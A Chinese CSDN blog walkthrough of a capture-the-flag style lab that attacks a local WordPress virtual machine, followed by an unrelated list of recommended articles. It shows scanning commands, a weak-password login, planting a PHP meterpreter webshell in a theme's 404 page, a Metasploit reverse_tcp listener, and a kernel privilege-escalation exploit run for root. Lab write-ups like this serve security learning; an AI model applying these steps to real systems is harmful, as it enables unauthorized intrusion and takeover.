前言

作者简介:不知名白帽,网络安全学习者。

博客主页:https://blog.csdn.net/m0_63127854?type=blog

CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html

网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan

目录

web安全介绍

环境配置

信息探测

深入挖掘

nikto扫描到robots.txt并进行访问

robots.txt文件出现/wordpress/,对其进行访问

返现用户登录界面,进行账号的枚举

尝试弱口令登录

生成webshell

上传shell

启动监听

执行shell

查看系统信息

提权

searchsploit ubuntu 4.4.0

编译代码

上传shellroot到/var/www/html下

下载shellroot到靶机

给shellroot提权并执行

web安全介绍

随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网英语越来越广泛,企业信息化的过程中各种英语都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更严重的则是在网页中植入恶意代码,使得网站访问者收到侵害。

环境配置

kali 192.168.20.128

靶机 192.168.20.142

链接:https://pan.baidu.com/s/1JOpCuCiS_ycd_ZRyehr4qw 
提取码:6cpf

信息探测

nmap -sV 192.168.20.142

nmap -A -v -T4 192.168.20.142

nikto -host http://192.168.20.142

dirb http://192.168.20.142

深入挖掘

nikto扫描到robots.txt并进行访问

robots.txt文件出现/wordpress/,对其进行访问

返现用户登录界面,进行账号的枚举

wpscan --url http://192.168.20.142/wordpress/ --enumerate at --enumerate ap --enumerate u

尝试弱口令登录

admin/admin

生成webshell

上传shell

复制生成的shell上传到404页面上

启动监听

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.20.128

set lport 4444

run

执行shell

http://192.168.20.142/wordpress/wp-content/themes/twentyfourteen/404.php

查看系统信息

提权

sudo -l提权不行

searchsploit ubuntu 4.4.0

编译代码

上传shellroot到/var/www/html下

下载shellroot到靶机

给shellroot提权并执行

chomod 777 shellroot

执行shellroot

CTF-综合测试(高难度)【超详细】相关推荐

  1. CTF|密码学常用网站超详细汇总

    CTF之密码学常用网站汇总 CTF中那些脑洞大开的编码和加密 https://www.tuicool.com/articles/2E3INnm 一篇文章彻底弄懂Base64编码原理 https://b ...

  2. JavaScript实现表单阻断提交--高效高可用超详细

    在web开发共,我们有验证表单的业务,用户的输入符合我们的要求,就可以提交,用户的输入不符合要求,就阻止用户提交,这样能够更好的提高用户体验,减轻服务器的压力.前台能完成的事情,就在前台完成. 效果图 ...

  3. Mobileye超详细研报:高逼格ADAS的内在修养

    Mobileye超详细研报:高逼格ADAS的内在修养 易车途2015-04-14 09:20:00 系统 工作 美国 阅读(58097)评论(0)分享到 清明节的时候,我去了一趟美国的大姨妈家,发现美 ...

  4. k8s1.18多master节点高可用集群安装-超详细中文官方文档

    kubernetes安装系列文章 kubernetes1.17.3安装-超详细的安装步骤 安装kubernetes1.17.3多master节点的高可用集群 k8s1.18单master节点高可用集群 ...

  5. 详解 K8S 高可用部署,超详细

    一.前言 二.基础环境部署 1)前期准备(所有节点) 2)安装容器 docker(所有节点) 3)配置 k8s yum 源(所有节点) 4)将 sandbox_image 镜像源设置为阿里云 goog ...

  6. 超详细面经:无论文、无实习拿下腾讯CV算法岗

    关注上方"深度学习技术前沿",选择"星标公众号", 资源干货,第一时间送达! 作者:清雨卢 知乎链接:https://zhuanlan.zhihu.com/p/ ...

  7. linux入门_Linux超详细0基础入门篇(一)

    首先要感谢大康老师对我在Linux操作系统上的教导. 今天来讲一下用途广泛的Linux的基础入门教程 仅仅是做入门使用,如果想更加深入的学习那就需要自己做探索了. 本次例子使用的是kali linux ...

  8. 微服务Springcloud超详细教程+实战(二)

    微服务Springcloud超详细教程+实战(二) -------------------------------------- 远程调用方式 无论是微服务还是分布式服务(都是SOA,都是面向服务编程 ...

  9. TypeScript超详细入门教程(上)

    TypeScript超详细入门教程(上) 01 开篇词:Hello~TypeScript 01 开篇词:Hello~TypeScript 更新时间:2019-10-30 13:49:46 既然我已经踏 ...

  10. 卷积神经网络超详细介绍

    文章目录 1.卷积神经网络的概念 2. 发展过程 3.如何利用CNN实现图像识别的任务 4.CNN的特征 5.CNN的求解 6.卷积神经网络注意事项 7.CNN发展综合介绍 8.LeNet-5结构分析 ...

最新文章

  1. 混合现实未来的八大应用场景
  2. spwm逆变器双极性matlab教程,基于MATLAB/Simulink的SPWM逆变电源的建模与仿真
  3. python用途与前景-Python 就业方面的选择与应用分析
  4. 集成学习-Boosting集成学习算法XGBoost
  5. simapro学习_北京师范大学环境学院
  6. mysql windows ad_您可以使用PHP获得Windows(AD)用户名吗?
  7. CLR via C# 笔记系列 - clr的执行模型
  8. Redis List 类型操作及常用命令
  9. mysql第三方工具binlog_mysql 开发进阶篇系列 33 工具篇(mysqlbinlog日志管理工具)
  10. 20190508——python基础(if...in...循环语句、while循环、两种循环对比)
  11. 10 件在 PHP 7 中不要做的事情
  12. oracle复制表到mysql_oracle – 如何将数据从一个数据库/表复制到另一个数据库/表...
  13. Hinton反思新作:我说反向传播不好,但还是没谁能颠覆它
  14. Steam怎么和Steam link远程畅玩?
  15. 2021/8/10 正在F-Droid里下载Termux...
  16. VS2019下cmake项目:利用ELAS方法计算双目视差
  17. 如何备份光猫html文件夹,华为光猫备份jffs2及HG8321R-RMS切换HG8321版本教程
  18. 汽车软件系统常用简称
  19. C#绘制中国象棋棋盘
  20. 码蹄集 - MT2095 · 曲径折跃

热门文章

  1. Red Gate 破解
  2. 各种博客的代码高亮是如何实现的
  3. golang 设置goproxy代理的小细节,适用于go module下载超时,阿里云镜像go module下载超时
  4. 10个最佳企业移动支付APP应用和酷站欣赏
  5. voicewo在线语音识别转换jQuery插件
  6. 用ImageMagick转换缩小JPG图像提高图像质量的方法
  7. science 计算机论文,计算机科学毕业论文
  8. T20,寻寻觅觅冷冷清清凄凄惨惨切切。。。
  9. java pv uv_前端数据收集(pv/uv)
  10. netty源码分析7-NioEventLoop-run方法疑难点